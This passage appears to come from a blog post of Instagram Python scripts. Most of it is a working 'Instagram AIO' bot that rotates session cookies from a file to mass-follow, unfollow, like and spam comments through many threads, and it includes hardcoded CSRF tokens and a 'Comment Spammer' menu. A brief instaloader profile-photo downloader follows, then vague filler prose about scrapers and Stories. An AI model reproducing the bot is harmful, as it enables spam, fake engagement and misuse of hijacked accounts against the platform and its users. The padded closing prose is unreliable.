β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—    β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ–ˆβ–ˆβ•”β–ˆβ–ˆβ•‘β€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ
β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•‘ β•šβ•β•β•β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ
β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•   β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ•β• β–ˆβ–ˆβ•‘β€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ
β•šβ•β•β•šβ•β• β•šβ•β•β•β•šβ•β•β•β•β•β•    β•šβ•β•   β•šβ•β•  β•šβ•β• β•šβ•β•β•β•β•β• β•šβ•β•  β•šβ•β•β•šβ•β•  β•šβ•β•β•šβ•β•      β•šβ•β•β€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ
 β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— 
β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘
β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘
β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•
β•šβ•β•  β•šβ•β•β•šβ•β• β•šβ•β•β•β•β•  """)


class Fore:
    BLACK     = "\033[30m"
    RED       = "\033[31m"
    GREEN     = "\033[32m"
    YELLOW    = "\033[33m"
    BLUE      = "\033[34m"
    MAGENTA   = "\033[35m"
    CYAN      = "\033[36m"
    WHITE     = "\033[37m"
    UNDERLINE = "\033[4m"
    RESET     = "\033[0m"


class Choose_Cookie():

    def get_cookie():
        with open('input/cookies.txt', 'r') as f:
            cookies = [line.strip('\n') for line in f]
        return cookies
    cookie = get_cookie()
    cookies2 = cycle(cookie)
    print(cookies2)

class Convert():

    
    def get_like_id(post_id):

        headers = {
            'authority': 'www.instagram.com',
            'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
            'accept-language': 'en-GB,en;q=0.9',
            'cache-control': 'max-age=0',
            'sec-ch-prefers-color-scheme': 'light',
            'sec-ch-ua': '"Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"',
            'sec-ch-ua-mobile': '?0',
            'sec-ch-ua-platform': '"Windows"',
            'sec-fetch-dest': 'document',
            'sec-fetch-mode': 'navigate',
            'sec-fetch-site': 'none',
            'sec-fetch-user': '?1',
            'upgrade-insecure-requests': '1',
            'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36',
        }

        r = requests.get(f'https://www.instagram.com/p/{post_id}/', headers=headers)
        data = r.text
        get_data = data.split('postPage_')[1]
        id = get_data.split('"')[0]
        return id


    def get_user_id(username):
        
        headers = {
            'authority': 'i.instagram.com',
            'accept': '*/*',
            'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',
            'origin': 'https://www.instagram.com',
            'referer': 'https://www.instagram.com/',
            'sec-ch-ua': '"Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105"',
            'sec-ch-ua-mobile': '?0',
            'sec-ch-ua-platform': '"Windows"',
            'sec-fetch-dest': 'empty',
            'sec-fetch-mode': 'cors',
            'sec-fetch-site': 'same-site',
            'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36',
            'x-csrftoken': '2SAvFYoHgS8GwleiP7j5vTLPqRJX4IFL',
            'x-ig-app-id': '936619743392459',
        }

        params = {
            'username': username,
        }

        r = requests.get('https://i.instagram.com/api/v1/users/web_profile_info/', params=params, headers=headers)
        id = r.text.split('"id":"')[2].split('"')[0]
        return id




class Follow():
    sem = threading.Semaphore(200)

    def follow(username):

        with Follow.sem:

            cookie = next(Choose_Cookie.cookies2)
            
            user_id = Convert.get_user_id(username)

            headers = {
                'authority': 'www.instagram.com',
                'accept': '*/*',
                'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',
                'content-type': 'application/x-www-form-urlencoded',
                'cookie': f'sessionid={cookie}',
                'origin': 'https://www.instagram.com',
                'referer': f'https://www.instagram.com/{username}/',
                'sec-ch-ua': '"Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"',
                'sec-ch-ua-mobile': '?0',
                'sec-ch-ua-platform': '"Windows"',
                'sec-fetch-dest': 'empty',
                'sec-fetch-mode': 'cors',
                'sec-fetch-site': 'same-origin',
                'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36',
                'x-csrftoken': '2SAvFYoHgS8GwleiP7j5vTLPqRJX4IFL',
                'x-requested-with': 'XMLHttpRequest',
            }

            r = requests.post(f'https://www.instagram.com/web/friendships/{user_id}/follow/', headers=headers)
            if r.status_code == 200:
                print(f"{Fore.GREEN}[+] Followed{Fore.RESET} {username}\n")
            else:
                print(f"{Fore.RED}Error{Fore.RESET}\n")


    def unfollow(username):

        with Follow.sem:

            cookie = next(Choose_Cookie.cookies2)

            user_id = Convert.get_user_id(username)

            headers = {
                'authority': 'www.instagram.com',
                'accept': '*/*',
                'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',
                'content-type': 'application/x-www-form-urlencoded',
                'cookie': f'sessionid={cookie}',
                'origin': 'https://www.instagram.com',
                'referer': f'https://www.instagram.com/{username}/',
                'sec-ch-ua': '"Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"',
                'sec-ch-ua-mobile': '?0',
                'sec-ch-ua-platform': '"Windows"',
                'sec-fetch-dest': 'empty',
                'sec-fetch-mode': 'cors',
                'sec-fetch-site': 'same-origin',
                'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36',
                'x-csrftoken': '2SAvFYoHgS8GwleiP7j5vTLPqRJX4IFL',
                'x-requested-with': 'XMLHttpRequest',
            }

            r = requests.post(f'https://www.instagram.com/web/friendships/{user_id}/unfollow/', headers=headers)
            print(r.status_code)
            if r.status_code == 200:
                print(f"{Fore.GREEN}[+] Unfollowed{Fore.RESET} {username}\n")
            else:
                print(f"{Fore.RED}Error{Fore.RESET}\n")



class Misc():

    def Like(post_id):

        cookie = next(Choose_Cookie.cookies2)

        like_id = Convert.get_like_id(post_id)

        headers = {
            'authority': 'www.instagram.com',
            'accept': '*/*',
            'accept-language': 'en-GB,en;q=0.9',
            'content-type': 'application/x-www-form-urlencoded',
            'cookie': f'sessionid={cookie}',
            'origin': 'https://www.instagram.com',
            'referer': f'https://www.instagram.com/p/{post_id}/',
            'sec-ch-ua': '"Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"',
            'sec-ch-ua-mobile': '?0',
            'sec-ch-ua-platform': '"Windows"',
            'sec-fetch-dest': 'empty',
            'sec-fetch-mode': 'cors',
            'sec-fetch-site': 'same-origin',
            'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36',
            'x-csrftoken': 'eB8F8DBi9fUrycehIas063lomgcrfwLS',
            'x-requested-with': 'XMLHttpRequest',
            }
            
        r = requests.post(f'https://www.instagram.com/web/likes/{like_id}/like/', headers=headers)
        if r.status_code == 200:
            print(f"{Fore.GREEN}[+] Liked{Fore.RESET} {post_id}\n")
        else:
            print(f"{Fore.RED}Error{Fore.RESET}\n")

    def comment(post_id, message):

        cookie = next(Choose_Cookie.cookies2)

        comment_id = Convert.get_like_id(post_id)

        headers = {
            'authority': 'www.instagram.com',
            'accept': '*/*',
            'accept-language': 'en-GB,en;q=0.9',
            'cookie': cookie,
            'origin': 'https://www.instagram.com',
            'referer': 'https://www.instagram.com/p/B-448qKlHbz/',
            'sec-ch-prefers-color-scheme': 'light',
            'sec-ch-ua': '"Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"',
            'sec-ch-ua-mobile': '?0',
            'sec-ch-ua-platform': '"Windows"',
            'sec-fetch-dest': 'empty',
            'sec-fetch-mode': 'cors',
            'sec-fetch-site': 'same-origin',
            'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36',
            'viewport-width': '1083',
            'x-asbd-id': '198387',
            'x-csrftoken': 'kebImKHMQVjftn79AU80A0pqW4ugYOfA',
            'x-requested-with': 'XMLHttpRequest',
        }

        data = {
            'comment_text': message,
            'replied_to_comment_id': '',
        }

        r = requests.post(f'https://www.instagram.com/web/comments/{comment_id}/add/', headers=headers, data=data)
        print(r.text)
        if r.status_code == 200:
            print(f"{Fore.GREEN}[+] Commented{Fore.RESET} {message}\n")
        else:
            print(f"{Fore.RED}Error{Fore.RESET}\n")



os.system('cls')
def menu():
    os.system(f'title Instagram Aio ^| Made by: Hazza ^| Version: v1')
    pystyle.Write.Print("""
                        β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ–ˆβ•—β€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ
                        β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β•šβ•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β• β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ•‘β€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ
                        β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—    β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ–ˆβ–ˆβ•”β–ˆβ–ˆβ•‘β€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ
                        β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•‘ β•šβ•β•β•β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ
                        β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•   β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ•β• β–ˆβ–ˆβ•‘β€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ
                        β•šβ•β•β•šβ•β• β•šβ•β•β•β•šβ•β•β•β•β•β•     β•šβ•β•   β•šβ•β•  β•šβ•β• β•šβ•β•β•β•β•β• β•šβ•β•  β•šβ•β•β•šβ•β•  β•šβ•β•β•šβ•β•     β•šβ•β•β€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ
                        β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— 
                        β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—
                        β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘
                        β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘
                        β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•
                        β•šβ•β•  β•šβ•β•β•šβ•β• β•šβ•β•β•β•β• """, pystyle.Colors.purple_to_blue, interval=0)



    print("")
    print("")
    print("")


    # print(f'                                            {Fore.RED}[{Fore.RESET} {Fore.BLUE}0{Fore.RESET} {Fore.RED}]{Fore.RESET} Account Generator')
    print(f'                                            {Fore.RED}[{Fore.RESET} {Fore.BLUE}1{Fore.RESET} {Fore.RED}]{Fore.RESET} Follow Bot')
    print(f'                                            {Fore.RED}[{Fore.RESET} {Fore.BLUE}2{Fore.RESET} {Fore.RED}]{Fore.RESET} Unfollow Bot')
    print(f'                                            {Fore.RED}[{Fore.RESET} {Fore.BLUE}3{Fore.RESET} {Fore.RED}]{Fore.RESET} Like Bot')
    print(f'                                            {Fore.RED}[{Fore.RESET} {Fore.BLUE}4{Fore.RESET} {Fore.RED}]{Fore.RESET} Comment Spammer')


    print("")
    print("")
    print("")


    choice = int(input(f"{Fore.GREEN} [{Fore.CYAN}?{Fore.GREEN}] Enter Choice {Fore.GREEN}> {Fore.WHITE}"))

    if choice == 1:
        username = input("Enter username > ")
        threads = input("Amount of follows > ")
        for i in range(int(threads)):
            threading.Thread(target=Follow.follow, args=(username,)).start()

    if choice == 2:
        username = input("Enter username > ")
        threads = input("Amount of follows > ")
        for i in range(int(threads)):
            threading.Thread(target=Follow.unfollow, args=(username,)).start()

    if choice == 3:
        post_id = input("Enter Post ID > ")
        threads = input("Amount of likes > ")
        for i in range(int(threads)):
            threading.Thread(target=Misc.Like, args=(post_id,)).start()

    if choice == 4:
        post_id = input("Enter Post ID > ")
        message = input("Enter message to spam > ")
        threads = input("Amount of comments > ")
        for i in range(int(threads)):
            threading.Thread(target=Misc.comment, args=(post_id, message,)).start()

menu()

 

Download Profile Photo:

8. Instagram scraper – for anyone who wants to get more out of their Instagram account

Instagram is a great way to share photos and videos with friends and followers, but it can be hard to get the most out of your account. A good way to improve your Instagram account is to use a Instagram scraper. A Instagram scraper is a software program that helps you collect all the photos and videos that have been posted to your account in a specific time period. This can be a great way to get a better understanding of your account and to see what your followers are posting. There are a number of different Instagram scraper programs available online. You can find one that is compatible with your computer and your account, and that will give you the data you need to improve your account.

 

import instaloader
instagram = instaloader.Instaloader()
profil=input("Enter Username:")
instagram.download_profile(profil,profile_pic_only=True)

 

Conclusion:

In conclusion, Instagram scraper Python can be used to extract data from Instagram posts, including images, hashtags, and user profiles. Additionally, this tool can be used to generate insights about the content of posts, and to identify potential marketing opportunities.Instagram is a social media platform where people can post photos and videos of their lives. It’s become a popular way to share photos and videos of everyday life with friends and family. Instagram also has a feature called Stories, which lets people share a series of photos or videos together. Stories can be fun, interesting, or even scary! Some people use Stories to show off their creative talents or to share funny moments with friends. Stories are a great way to keep people updated on what’s happening in your life.